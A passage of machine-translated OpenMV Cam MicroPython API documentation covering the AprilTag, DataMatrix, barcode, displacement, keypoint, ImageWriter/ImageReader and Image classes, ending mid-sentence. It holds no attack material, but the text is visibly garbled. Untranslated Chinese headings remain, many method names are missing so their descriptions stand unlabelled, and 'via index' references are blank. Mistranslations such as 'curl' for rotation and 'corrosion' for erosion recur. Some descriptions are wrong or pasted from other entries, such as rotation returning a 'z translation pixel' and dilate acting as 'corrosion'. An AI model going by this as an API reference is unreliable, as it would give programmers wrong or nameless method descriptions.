apriltag.x_rotation()\n\nReturns the curl of the AprilTag in radians on the X plane. Example: Visually see the AprilTag and move the camera from left to right.\n\nYou can also get this value via index .\n\n#### apriltag.y_rotation()\n\nReturns the curl of the AprilTag in radians on the Y plane. Example: Visualize the AprilTag and move the camera from top to bottom.\n\nYou can also get this value via index .\n\n#### apriltag.z_rotation()\n\nReturns the curl of the AprilTag in radians on the Z plane. Example: Visualize the AprilTag and rotate the camera.\n\nNote: This is just a renamed version of apriltag.rotation().\n\nYou can also get this value via index .\n\n## 15. DataMatrix Class – Data Matrix Object\n\nThe data matrix object is returned by `image.find_datamatrices`.\n\n## 16. Constructor\n\nClass image.datamatrix\n\nCall the image.find_datamatrices() function to create this object.\n\n### 16.1. 方法\n\n#### datamatrix.corners()\n\nReturns a list of four tuples (x, y) consisting of the four corners of the object. The four corners are usually returned in a clockwise order starting from the upper left corner.\n\n#### datamatrix.rect()\n\nReturns a rectangular tuple (x, y, w, h) for other image methods such as image.draw_rectangle of the bounding box of the data matrix.\n\n#### datamatrix.x()\n\nReturns the x coordinate (int) of the bounding box of the data matrix.\n\nYou can also get this value via index .\n\n#### datamatrix.y()\n\nReturns the y coordinate (int) of the bounding box of the data matrix.\n\nYou can also get this value via index .\n\n#### datamatrix.w()\n\nReturns the w width of the bounding box of the data matrix.\n\nYou can also get this value via index .\n\n#### datamatrix.h()\n\nReturns the h height of the bounding box of the data matrix.\n\nYou can also get this value via index .\n\nReturns a string of payloads for the data matrix. 
Example: String.\n\nYou can also get this value via index .\n\n#### datamatrix.rotation()\n\nReturns the curl (float) of the data matrix in radians.\n\nYou can also get this value via index .\n\n#### datamatrix.rows()\n\nReturns the number of rows (int) of the data matrix.\n\nYou can also get this value via index .\n\n#### datamatrix.columns()\n\nReturns the number of columns (int) of the data matrix.\n\nYou can also get this value via index .\n\n#### datamatrix.capacity()\n\nReturns the number of characters this data matrix can hold.\n\nYou can also get this value via index .\n\nReturns the number of unused characters in this data matrix.\n\nYou can also get this value via index .\n\n## 17. BarCode Class – Barcode Object\n\nThe barcode object is returned by image.find_barcodes.\n\n## 18. Constructor\n\nClass image.barcode\n\nCall the image.find_barcodes() function to create this object.\n\n### 18.1. 方法\n\n#### barcode.corners()\n\nReturns a list of four tuples (x, y) consisting of the four corners of the object. The four corners are usually returned in a clockwise order starting from the upper left corner.\n\n#### barcode.rect()\n\nReturns a rectangular tuple (x, y, w, h) for other image methods such as image.draw_rectangle of the bounding box of the data matrix.\n\n#### barcode.x()\n\nReturns the x coordinate (int) of the bounding box of the barcode.\n\nYou can also get this value via index .\n\n#### barcode.y()\n\nReturns the y coordinate (int) of the bounding box of the barcode.\n\nYou can also get this value via index .\n\n#### barcode.w()\n\nReturns the w width (int) of the bounding box of the barcode.\n\nYou can also get this value via index .\n\n#### barcode.h()\n\nReturns the h height (int) of the bounding box of the barcode.\n\nYou can also get this value via index .\n\nReturns a string of the payload of the barcode. Example: Quantity.\n\nYou can also get this value via index .\n\n#### barcode.type()\n\nReturns the enumerated type (int) of the barcode.\n\nYou can also get this value via index .\n\nimage.EAN2 image.EAN5 image.EAN8 image.UPCE image.ISBN10 image.UPCA image.EAN13 image.ISBN13 image.I25 image.DATABAR image.DATABAR_EXP image.CODABAR image.CODE39 image.PDF417 - Enable in the future (e.g. is not working properly now). image.CODE93 image.CODE128\n\n#### barcode.rotation()\n\nReturns the curl (floating point) of the barcode in radians.\n\nYou can also get this value via index .\n\n#### barcode.quality()\n\nReturns the number of times the barcode was detected in the image (int).\n\nWhen scanning a barcode, each new scan line can decode the same barcode. Each time this process is performed, the value of the barcode will increase.\n\nYou can also get this value via index .\n\n## 19. Displacement class – displacement object\n\nThe displacement object is returned by image.find_displacement.\n\n### 19.1. Constructor\n\nClass image.displacement\n\nCall the image.find_displacement() function to create this object.\n\n### 19.2. 方法\n\n#### displacement.x_translation()\n\nReturns an x ​​translation pixel between two images. This is a precise subpixel, so it is a floating point number.\n\nYou can also get this value via index .\n\n#### displacement.y_translation()\n\nReturns the y translation pixel between the two images. This is a precise subpixel, so it is a floating point number.\n\nYou can also get this value via index .\n\n#### displacement.rotation()\n\nReturns the z translation pixel between the two images. 
The result is computed precisely, so it is a floating point number.

You can also get this value via index .

#### displacement.scale()

Returns the change in scale between the two images.

You can also get this value via index .

#### displacement.response()

Returns the quality of the displacement match between the two images, in the range 0–1. A displacement object with a response below 0.1 is probably noise.

You can also get this value via index .

## 20. Kptmatch Class – Feature Point Object

The feature point object is returned by `image.match_descriptor`.

### 20.1. Constructor

Class image.kptmatch

Call the image.match_descriptor() function to create this object.

### 20.2. Methods

#### kptmatch.rect()

Returns a rectangle tuple (x, y, w, h) of the feature point's bounding box, for use with other image methods such as image.draw_rectangle.

#### kptmatch.cx()

Returns the center x position (int) of the feature point.

You can also get this value via index .

#### kptmatch.cy()

Returns the center y position (int) of the feature point.

You can also get this value via index .

#### kptmatch.x()

Returns the x coordinate (int) of the bounding box of the feature point.

You can also get this value via index .

#### kptmatch.y()

Returns the y coordinate (int) of the bounding box of the feature point.

You can also get this value via index .

#### kptmatch.w()

Returns the width w (int) of the feature point bounding box.

You can also get this value via index .

#### kptmatch.h()

Returns the height h (int) of the feature point bounding box.

You can also get this value via index .

#### kptmatch.count()

Returns the number of matching feature points (int).

You can also get this value via index .

#### kptmatch.theta()

Returns the estimated rotation (int) of the feature point match.

You can also get this value via index .

#### kptmatch.match()

Returns the list of (x, y) tuples of the matched keypoints.

You can also get this value via index .

## 21. ImageWriter Class – ImageWriter Object

The ImageWriter object allows you to quickly write uncompressed images to disk.

### 21.1. Constructor

Class image.ImageWriter(path)

Creates an ImageWriter object that can write uncompressed images to disk in a simple OpenMV Cam file format. The uncompressed images can then be re-read using ImageReader.

### 21.2. Methods

#### imagewriter.size()

Returns the size of the file being written.

#### imagewriter.add_frame(image)

Writes an image to disk. Because the image is not compressed, this is fast but uses a lot of disk space.

#### imagewriter.close()

Closes the image stream file. You must close the file, otherwise it will be corrupted.

## 22. ImageReader Class – ImageReader Object

The ImageReader object allows you to quickly read uncompressed images from disk.

### 22.1. Constructor

Class image.ImageReader(path)

Creates an ImageReader object to play back image data written by an ImageWriter object. Frames are played back at the same FPS as when they were written to disk.

### 22.2. Methods

#### imagereader.size()

Returns the size of the file being read.

#### imagereader.next_frame([copy_to_fb=True, loop=True])

Returns an image object from a file written by ImageWriter. If copy_to_fb is True, the image object is loaded directly into the frame buffer. Otherwise the image object is placed in the heap. Note: unless the image is small, the heap may not have enough space to store it. If loop is True, playback restarts from the beginning after the last image of the stream has been read (a short record-and-playback sketch is shown below).
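Below is a minimal record-and-playback sketch tying ImageWriter and ImageReader together. It is only a sketch: it assumes the usual sensor setup, an SD card mounted at the root, and an arbitrary file name of "/stream.bin"; check the exact constructor and method names against the firmware you are running.

```python
# Sketch: record 100 uncompressed frames, then play them back once.
import sensor, image, time

sensor.reset()
sensor.set_pixformat(sensor.RGB565)
sensor.set_framesize(sensor.QQVGA)      # small frames keep the file size down
sensor.skip_frames(time=2000)

writer = image.ImageWriter("/stream.bin")
for i in range(100):
    writer.add_frame(sensor.snapshot()) # uncompressed, so fast but large on disk
writer.close()                          # must close, or the file is corrupted

reader = image.ImageReader("/stream.bin")
while True:
    img = reader.next_frame(copy_to_fb=True, loop=False)
    if img is None:                     # loop=False: None after the last frame
        break
reader.close()
```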
Otherwise, this method will return None after all frames have been read.\n\nNote: imagereader.next_frame attempts to limit the playback speed by pausing playback after reading the frame to match the speed of the frame recording. Otherwise, this method will play all images at a speed of 200+FPS.\n\nClose the file being read. You need to do this to prevent the imagereader object from being damaged. However, since it is a read-only file, the file will not be damaged when it is not closed.\n\n## 23. ImageClass - Image Object\n\nImage objects are the basic objects of machine vision operations.\n\n### 23.1. Constructor\n\nClass image.Image(path[, copy_to_fb=False])\n\nCreate a new image object from the file in path.\n\nSupport image files in bmp/pgm/ppm/jpg/jpeg format.\n\nIf copy_to_fb is True, the image will be loaded directly into the framebuffer and you can load large images. If False, the image will be loaded into the MicroPython heap, which is much smaller than the frame buffer.\n\nIn OpenMV Cam M4, if copy_to_fb is False, you should try to keep the image size below 8KB. If True, the image can be up to 160KB. In OpenMV Cam M7, if copy_to_fb is False, you should try to keep the image size below 16KB. If True, the image can be up to 320KB. The image supports the \"[]\" notation. Let image[index] = 8/16-bit value to assign image pixels or image[index] and get an image pixel. If it is a grayscale image of 16-bit RGB565 value for RGB image, this pixel is 8 Bit.\n\nFor JPEG images, \"[]\" gives you access to JPEG image patches in the form of compressed section arrays. Since JPEG images are in the form of compressed byte streams, reading and writing of data sets is opaque.\n\nThe image also supports read buffer operations. You can use the image as a section array object and enter the image into all types of MicroPython functions. If you want to transfer an image, you can pass it to the UART / SPI / I2C write function for automatic transfer.\n\n### 23.2. method\n\n#### image.width()\n\nReturns the width of the image in pixels.\n\n#### image.height()\n\nReturns the height of the image in pixels.\n\n#### image.format()\n\nReturns sensor.GRAYSCALE for grayscale images, sensor.RGB565 for RGB images, and sensor.JPEG for JPEG images.\n\n#### image.size()\n\nReturns the image size in bytes.\n\n#### image.get_pixel(x, y[, rgbtuple])\n\nGrayscale: Returns the grayscale pixel value at the (x, y) position.\n\nRGB565l: Returns the RGB888 pixel tuple (r, g, b) at the (x, y) position.\n\nBayer image: Returns the pixel value at the (x, y) position.\n\nCompressed images are not supported.\n\nimage.get_pixel() and `image.set_pixel()` are the only ways you can manipulate Bayer mode images. The Bayer pattern image is a text image. For even rows, where the pixels in the image are R/G/R/G/ and so on. For odd lines, where the pixels in the image are G/B/G/B/etc. Each pixel is 8 bits.\n\n#### image.set_pixel(x, y, pixel)\n\nGrayscale: Set the pixel at the (x, y) position to the grayscale value pixel .\n\nRGB image: Set the pixel at the (x, y) position to RGB888 tuple (r, g, b) pixel .\n\nCompressed images are not supported.\n\nimage.get_pixel() and `image.set_pixel()` are the only ways you can manipulate Bayer mode images. The Bayer pattern image is a text image. For even rows, where the pixels in the image are R/G/R/G/ and so on. For odd lines, where the pixels in the image are G/B/G/B/etc. 
Each pixel is 8 bits.\n\n#### image.mean_pool(x_div, y_div)\n\nFind the average of the x_div * y_div squares in the image and return a modified image consisting of the average of each square.\n\nThis method allows you to quickly reduce the image on the original image.\n\nCompressed images and bayer images are not supported.\n\n#### image.mean_pooled(x_div, y_div)\n\nFind the average of the x_div * y_div squares in the image and return a new image consisting of the average of each square.\n\nThis method allows you to create a reduced copy of the image.\n\nCompressed images and bayer images are not supported.\n\n#### image.midpoint_pool(x_div, y_div[, bias=0.5])\n\nFinds the midpoint value of the x_div * y_div square in the image and returns a modified image consisting of the midpoint values ​​of each square.\n\nBias is 0.0 to return the minimum value for each region, and `bias` is 1.0 to return the maximum value for each region.\n\nThis method allows you to quickly reduce the image on the original image.\n\nCompressed images and bayer images are not supported.\n\n#### image.midpoint_pooled(x_div, y_div[, bias=0.5])\n\nFinds the midpoint value of the x_div * y_div square in the image and returns a new image consisting of the midpoint values ​​of each square.\n\nBias is 0.0 to return the minimum value for each region, and `bias` is 1.0 to return the maximum value for each region.\n\nThis method allows you to create a reduced copy of the image.\n\nCompressed images and bayer images are not supported.\n\n#### image.to_grayscale([copy=False])\n\nConvert the image to a grayscale image. This method also modifies the base image pixels and changes the image size in bytes, so it can only be done on grayscale images or RGB565 images. Otherwise copy must be True to create a new modified image on the heap.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\n#### image.to_rgb565([copy=False])\n\nConvert an image to a color image. This method also modifies the base image pixels and changes the image size in bytes, so it can only be done on RGB565 images. Otherwise copy must be True to create a new modified image on the heap.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\n#### image.to_rainbow([copy=False])\n\nConvert an image to a rainbow image. This method also modifies the base image pixels and changes the image size in bytes, so it can only be done on RGB565 images. Otherwise copy must be True to create a new modified image on the heap.\n\nA rainbow image is a color image that has a unique color value for each 8-bit mask grayscale illumination value in the image. For example, it provides a heat map color for a thermal image.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\n#### image.compress([quality=50])\n\nJPEG properly compresses the image. Using this method to use a higher quality compression ratio is at the expense of destroying the original image compared to the compressed save heap space.\n\nQuality is the compression quality (0-100) (int).\n\n#### image.compress_for_ide([quality=50])\n\nJPEG properly compresses the image. 
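As a quick illustration of image.compress() described above and image.compressed() documented just below, here is a sketch only, assuming the usual sensor setup and enough free heap for the compressed copy:

```python
# Sketch: in-place JPEG compression vs. a compressed copy on the heap.
import sensor, time

sensor.reset()
sensor.set_pixformat(sensor.RGB565)
sensor.set_framesize(sensor.QVGA)
sensor.skip_frames(time=2000)

img = sensor.snapshot()
print("raw size:", img.size())        # uncompressed size in bytes

jpg = img.compressed(quality=50)      # new JPEG copy; the original stays untouched
print("copy size:", jpg.size())       # may raise MemoryError if the heap is low

img.compress(quality=50)              # compresses the frame buffer in place
print("in-place size:", img.size())   # img is now a JPEG image
```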
Using this method to use a higher quality compression ratio is at the expense of destroying the original image compared to the compressed save heap space.\n\nThis method compresses the image and then formats the JPEG data by encoding each 6 bits into a byte between 128 and 191 and converts it to OpenMV IDE for display. This step is done to prevent JPEG data from being mistaken for other text data in the byte stream.\n\nYou need to use this method to format the image data for display in the terminal window created by Open Terminal in OpenMV IDE.\n\nQuality is the compression quality (0-100) (int).\n\n#### image.compressed([quality=50])\n\nReturns a JPEG compressed image - the original image is unprocessed. However, this method requires a large allocation of heap space, so image compression quality and image resolution must be low.\n\nQuality is the compression quality (0-100) (int).\n\n#### image.compressed_for_ide([quality=50])\n\nReturns a JPEG compressed image - the original image is unprocessed. However, this method requires a large allocation of heap space, so image compression quality and image resolution must be low.\n\nThis method compresses the image and then formats the JPEG data by encoding each 6 bits into a byte between 128 and 191 and converts it to OpenMV IDE for display. This step is done to prevent JPEG data from being mistaken for other text data in the byte stream.\n\nYou need to use this method to format the image data for display in the terminal window created by Open Terminal in OpenMV IDE.\n\nQuality is the compression quality (0-100) (int).\n\n#### image.copy([roi[, copy_to_fb=False]])\n\nCreate a copy of the image object.\n\nRoi is a region of interest (x, y, w, h) of a rectangle to be copied. If not specified, the ROI copies the image rectangle of the entire image. But this does not apply to JPEG images.\n\nRemember that the image copy is stored in the MicroPython heap instead of the frame buffer. Again, you need to keep the image copy size below 8KB (OpenMV) or below 16KB (OpenMV Cam M7). If you want to use a copy operation to use all the heap space, this function will get an exception. An oversized image can easily trigger an exception.\n\nIf copy_to_fb is True, this method replaces the framebuffer with an image. The frame buffer has much larger space than the heap and can accommodate large images.\n\n#### image.save(path[, roi[, quality=50]])\n\nSave a copy of the image to the file system in path.\n\nSupport image files in bmp/pgm/ppm/jpg/jpeg format. Note: You cannot save a compressed image in jpeg format to an uncompressed format.\n\nRoi is a region of interest (x, y, w, h) of a rectangle to be copied. If not specified, the ROI copies the image rectangle of the entire image. But this does not apply to JPEG images.\n\nQuality refers to the JPEG compression quality that saves the image to JPEG format when the image has not been compressed.\n\n#### image.clear()\n\nSet all pixels in the image to zero (very fast).\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images are not supported.\n\n#### image.draw_line(x0, y0, x1, y1[, color[, thickness=1]])\n\nDraw a line from (x0, y0) to (x1, y1) on the image. You can pass x0, y0, x1, y1 individually or to a tuple (x0, y0, x1, y1).\n\nColor is the RGB888 tuple for grayscale or RGB565 images. The default is white. 
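For example, a minimal drawing sketch using image.draw_line() together with two of the drawing calls documented just below (the coordinates and colors are arbitrary):

```python
# Sketch: draw an overlay on each live frame.
import sensor, time

sensor.reset()
sensor.set_pixformat(sensor.RGB565)
sensor.set_framesize(sensor.QVGA)
sensor.skip_frames(time=2000)

while True:
    img = sensor.snapshot()
    # Red diagonal line, 3 pixels thick.
    img.draw_line(0, 0, img.width() - 1, img.height() - 1,
                  color=(255, 0, 0), thickness=3)
    # Green rectangle outline around the center of the frame.
    img.draw_rectangle(80, 60, 160, 120, color=(0, 255, 0))
    # White label in the top-left corner.
    img.draw_string(4, 4, "OpenMV", color=(255, 255, 255), scale=2)
```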
However, you can also pass the base pixel value of the grayscale image (0-255) or the byte of the RGB565 image to invert the RGB565 value.\n\nThickness The thickness of the control line.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\n#### image.draw_rectangle(x, y, w, h[, color[, thickness=1[, fill=False]]])\n\nDraw a rectangle on the image. You can pass x, y, w, h alone or as a tuple (x, y, w, h).\n\nColor is the RGB888 tuple for grayscale or RGB565 images. The default is white. However, you can also pass the base pixel value of the grayscale image (0-255) or the byte of the RGB565 image to invert the RGB565 value.\n\nThickness The thickness of the control line.\n\nSet fill to True to fill the rectangle.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\n#### image.draw_circle(x, y, radius[, color[, thickness=1[, fill=False]]])\n\nDraw a circle on the image. You can pass x, y, radius alone or as a tuple (x, y, radius).\n\nColor is the RGB888 tuple for grayscale or RGB565 images. The default is white. However, you can also pass the base pixel value of the grayscale image (0-255) or the byte of the RGB565 image to invert the RGB565 value.\n\nThickness The thickness of the control line.\n\nSet fill to True to fill the circle.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\n#### image.draw_string(x, y, text[, color[, scale=1[, x_spacing=0[, y_spacing=0[, mono_space=True]]]])\n\nDraw 8x10 text from the (x, y) position in the image. You can pass x, y alone or as a tuple (x, y).\n\nText is a string that is written to the image. The \\n, \\r, and \\r\\n terminators move the cursor to the next line.\n\nColor is the RGB888 tuple for grayscale or RGB565 images. The default is white. However, you can also pass the base pixel value of the grayscale image (0-255) or the byte of the RGB565 image to invert the RGB565 value.\n\nYou can increase the scale to increase the size of the text on the image.\n\nOnly integer values ​​(for example, 1/2/3 / etc).\n\nX_spacing allows you to add (if positive) or subtract (if negative) x pixels between characters to set the character spacing.\n\nY_spacing allows you to add (if positive) or subtract (if negative) y pixels between characters to set the line spacing.\n\nMono_space defaults to True, which forces the text spacing to be fixed. For big text, this looks bad. Setting False to get a non-fixed width of character spacing looks much better.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\n#### image.draw_cross(x, y[, color[, size=5[, thickness=1]]])\n\nDraw a cross on the image. You can pass x, y alone or as a tuple (x, y).\n\nColor is the RGB888 tuple for grayscale or RGB565 images. The default is white. However, you can also pass the base pixel value of the grayscale image (0-255) or the byte of the RGB565 image to invert the RGB565 value.\n\nSize Controls the extension of the crosshair.\n\nThickness Controls the pixel thickness of the edge.\n\nReturns an image object so that you can use the . 
notation to call another method.\n\nCompressed images and bayer images are not supported.\n\n#### image.draw_arrow(x0, y0, x1, y1[, color[, thickness=1]])\n\nDraw an arrow from (x0, y0) to (x1, y1) on the image. You can pass x0, y0, x1, y1 individually or to a tuple (x0, y0, x1, y1).\n\nColor is the RGB888 tuple for grayscale or RGB565 images. The default is white. However, you can also pass the base pixel value of the grayscale image (0-255) or the byte of the RGB565 image to invert the RGB565 value.\n\nThickness The thickness of the control line.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\n#### image.draw_image(image, x, y[, x_scale=1.0[, y_scale=1.0[, mask=None]]])\n\nDraw an image whose top left corner starts at position x, y. You can pass x, y alone or pass it to a tuple (x, y).\n\nX_scale Controls the extent to which the image is scaled in the x direction (floating point).\n\nY_scale Controls the extent to which the image is scaled in the y direction (floating point).\n\nMask is another image that is used as a pixel-level mask for drawing operations. The mask should be an image with only black or white pixels and should be the same size as the image you are drawing. You can use the mask mask to draw.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\n#### image.draw_keypoints(keypoints[, color[, size=10[, thickness=1[, fill=False]]]])\n\nDraw a point of a feature point object on the image.\n\nColor is the RGB888 tuple for grayscale or RGB565 images. The default is white. However, you can also pass the base pixel value of the grayscale image (0-255) or the byte of the RGB565 image to invert the RGB565 value.\n\nSize Controls the size of feature points.\n\nThickness The thickness of the control line.\n\nSet fill to True to fill the feature points.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\n#### image.flood_fill(x, y[, seed_threshold=0.05[, floating_threshold=0.05[, color[, invert=False[, clear_background=False[, mask=None]]]]])\n\nThe area where the image is filled starting from position x, y. You can pass x, y alone or pass it to a tuple (x, y).\n\nSeed_threshold Controls the difference between the pixels in the fill area and the original start pixel.\n\nFloating_threshold Controls the difference between pixels in the fill area and any adjacent pixels.\n\nColor is the RGB888 tuple for grayscale or RGB565 images. The default is white. However, you can also pass the base pixel value of the grayscale image (0-255) or the byte of the RGB565 image to invert the RGB565 value.\n\nPass invert to True to repopulate everything outside the flood_fill connection area.\n\nPass clear_background as True and zero the remaining flood_fill pixels that are not recolored.\n\nMask is another image that is used as a pixel-level mask for drawing operations. The mask should be an image with only black or white pixels and should be the same size as the image you are drawing. Only the pixels set in the mask will be evaluated at flood_fill.\n\nReturns an image object so that you can use the . 
notation to call another method.\n\nCompressed images and bayer images are not supported.\n\nThis method is not available on OpenMV Cam M4.\n\nSets all pixels in the image to black or white depending on whether the pixel is within the threshold in the threshold list thresholds.\n\nThe thresholds must be a list of tuples. [(lo, hi), (lo, hi), ..., (lo, hi)] Define the range of colors you want to track. For grayscale images, each tuple needs to contain two values ​​- the minimum gray value and the maximum gray value. Only pixel regions that fall between these thresholds are considered. For RGB565 images, each tuple needs to have six values ​​(l_lo, l_hi, a_lo, a_hi, b_lo, b_hi) - the minimum and maximum values ​​for the LAB L, A and B channels, respectively. For ease of use, this feature will automatically fix the minimum and maximum values ​​of the exchange. Also, if the tuple is greater than six values, the remaining values ​​are ignored. Conversely, if the tuple is too short, the remaining thresholds are assumed to be in the maximum range.\n\nannotation\n\nTo get the threshold of the tracked object, simply select (click and drag) the tracking object in the IDE framebuffer. The histogram will be updated accordingly to the area. Then just write down the color distribution in the starting and falling positions in each histogram channel. These will be the low and high values ​​of thresholds. Since the difference between the upper and lower quartiles is small, the threshold is manually determined.\n\nYou can also determine the color threshold by going to Tools -> Machine Vision -> Threshold Editor in the OpenMV IDE and dragging the slider from the GUI window.\n\nInvert Reverses the threshold operation, where pixels are matched outside of the known color range, not within the known color range.\n\nSet zero to True to make the threshold pixel zero and leave the pixels that are not in the threshold list unchanged.\n\nMask is another image that is used as a pixel-level mask for drawing operations. The mask should be an image with only black or white pixels and should be the same size as the image you are drawing. Only the pixels set in the mask are modified.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\n#### image.invert()\n\nChange binary image 0 (black) to 1 (white) and 1 (white) to 0 (black) to flip all pixel values ​​in the binary image very quickly.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and Bayer images are not supported.\n\nUse another image to perform a logical AND operation with this image.\n\nImage can be an image object, the path to an uncompressed image file (bmp/pgm/ppm), or a scalar value. If a scalar value, the value can be an RGB888 tuple or a base pixel value (eg, an 8-bit grayscale of a grayscale image or a byte-inverted RGB565 value of an RGB image).\n\nMask is another image that is used as a pixel-level mask for drawing operations. The mask should be an image with only black or white pixels and should be the same size as the image you are drawing. Only the pixels set in the mask are modified.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\nUse another image to perform a logical AND operation with this image.\n\nImage can be an image object, the path to an uncompressed image file (bmp/pgm/ppm), or a scalar value. 
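As an aside, here is a minimal sketch of the thresholding operation described above. The method name image.binary() is an assumption, since its heading is missing from the text, and the LAB threshold is an arbitrary red-ish range you would tune in the OpenMV IDE Threshold Editor.

```python
# Sketch: turn an RGB565 frame into a black/white mask of "red-ish" pixels.
import sensor, time

sensor.reset()
sensor.set_pixformat(sensor.RGB565)
sensor.set_framesize(sensor.QVGA)
sensor.skip_frames(time=2000)

# (L_lo, L_hi, A_lo, A_hi, B_lo, B_hi) in LAB color space -- tune for your target.
red_threshold = (30, 100, 15, 127, 15, 127)

while True:
    img = sensor.snapshot()
    img.binary([red_threshold])   # in-threshold pixels -> white, others -> black
```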
If a scalar value, the value can be an RGB888 tuple or a base pixel value (eg, an 8-bit grayscale of a grayscale image or a byte-inverted RGB565 value of an RGB image).\n\nMask is another image that is used as a pixel-level mask for drawing operations. The mask should be an image with only black or white pixels and should be the same size as the image you are drawing. Only the pixels set in the mask are modified.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\nUse another image to perform a logical OR operation with this image.\n\nImage can be an image object, the path to an uncompressed image file (bmp/pgm/ppm), or a scalar value. If a scalar value, the value can be an RGB888 tuple or a base pixel value (eg, an 8-bit grayscale of a grayscale image or a byte-inverted RGB565 value of an RGB image).\n\nMask is another image that is used as a pixel-level mask for drawing operations. The mask should be an image with only black or white pixels and should be the same size as the image you are drawing. Only the pixels set in the mask are modified.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\nUse another image to perform a logical OR operation with this image.\n\nImage can be an image object, the path to an uncompressed image file (bmp/pgm/ppm), or a scalar value. If a scalar value, the value can be an RGB888 tuple or a base pixel value (eg, an 8-bit grayscale of a grayscale image or a byte-inverted RGB565 value of an RGB image).\n\nMask is another image that is used as a pixel-level mask for drawing operations. The mask should be an image with only black or white pixels and should be the same size as the image you are drawing. Only the pixels set in the mask are modified.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\nUse another image to perform an exclusive OR operation with this image.\n\nImage can be an image object, the path to an uncompressed image file (bmp/pgm/ppm), or a scalar value. If a scalar value, the value can be an RGB888 tuple or a base pixel value (eg, an 8-bit grayscale of a grayscale image or a byte-inverted RGB565 value of an RGB image).\n\nMask is another image that is used as a pixel-level mask for drawing operations. The mask should be an image with only black or white pixels and should be the same size as the image you are drawing. Only the pixels set in the mask are modified.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\nUse another image to logically AND the same image.\n\nImage can be an image object, the path to an uncompressed image file (bmp/pgm/ppm), or a scalar value. If a scalar value, the value can be an RGB888 tuple or a base pixel value (eg, an 8-bit grayscale of a grayscale image or a byte-inverted RGB565 value of an RGB image).\n\nMask is another image that is used as a pixel-level mask for drawing operations. The mask should be an image with only black or white pixels and should be the same size as the image you are drawing. Only the pixels set in the mask are modified.\n\nReturns an image object so that you can use the . 
notation to call another method.\n\nCompressed images and bayer images are not supported.\n\nRemove pixels from the edges of the split area.\n\nThis method is implemented by convolving the kernel of ((size2)+1)x((size2)+1) pixels on the convolution image. If the sum of the adjacent pixel sets is smaller than threshold, then the center pixel of the kernel is performed. Return to zero.\n\nIf the threshold is not set, this method functions as the standard corrosion method. If the threshold is set, you can specify a specific pixel to be etched. For example, set a threshold of 2 around pixels that are less than 2 pixels.\n\nMask is another image that is used as a pixel-level mask for drawing operations. The mask should be an image with only black or white pixels and should be the same size as the image you are drawing. Only the pixels set in the mask are modified.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\nAdd pixels to the edges of the split area.\n\nThis method is implemented by convolving the kernel of ((size2)+1)x((size2)+1) pixels on the convolution image. If the sum of the adjacent pixel sets is greater than threshold, the central pixel of the kernel is performed. Settings.\n\nIf the threshold is not set, this method functions as the standard corrosion method. If the threshold is set, you can specify a specific pixel to be etched. For example, set a threshold of 2 around pixels that are less than 2 pixels.\n\nMask is another image that is used as a pixel-level mask for drawing operations. The mask should be an image with only black or white pixels and should be the same size as the image you are drawing. Only the pixels set in the mask are modified.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\nThe image is subjected to corrosion and expansion in sequence. See image.erode() and image.dilate() for more information.\n\nMask is another image that is used as a pixel-level mask for drawing operations. The mask should be an image with only black or white pixels and should be the same size as the image you are drawing. Only the pixels set in the mask are modified.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\nThe image is expanded and etched in sequence. See image.erode() and image.dilate() for more information.\n\nMask is another image that is used as a pixel-level mask for drawing operations. The mask should be an image with only black or white pixels and should be the same size as the image you are drawing. Only the pixels set in the mask are modified.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\nReturns the difference between the original image and the image after executing the image.open() function.\n\nMask is another image that is used as a pixel-level mask for drawing operations. The mask should be an image with only black or white pixels and should be the same size as the image you are drawing. Only the pixels set in the mask are modified.\n\nCompressed images and bayer images are not supported.\n\nReturns the difference between the original image and the image after executing the image.close() function.\n\nMask is another image that is used as a pixel-level mask for drawing operations. 
The mask should be an image with only black or white pixels and should be the same size as the image you are drawing. Only the pixels set in the mask are modified.\n\nCompressed images and bayer images are not supported.\n\n#### image.negate()\n\nFlip (number invert) all pixel values ​​in the image very quickly. The value of the pixel value of each color channel is converted. Example: (255 - pixel).\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\nImage can be an image object, the path to an uncompressed image file (bmp/pgm/ppm), or a scalar value. If a scalar value, the value can be an RGB888 tuple or a base pixel value (eg, an 8-bit grayscale of a grayscale image or a byte-inverted RGB565 value of an RGB image).\n\nSet hmirror to True to replace the image with a horizontal mirror.\n\nSet vflip to True to replace the image with a vertical flip.\n\nMask is another image that is used as a pixel-level mask for drawing operations. The mask should be an image with only black or white pixels and should be the same size as the image you are drawing. Only the pixels set in the mask are modified.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\nAdd two images to each other in pixels.\n\nImage can be an image object, the path to an uncompressed image file (bmp/pgm/ppm), or a scalar value. If a scalar value, the value can be an RGB888 tuple or a base pixel value (eg, an 8-bit grayscale of a grayscale image or a byte-inverted RGB565 value of an RGB image).\n\nMask is another image that is used as a 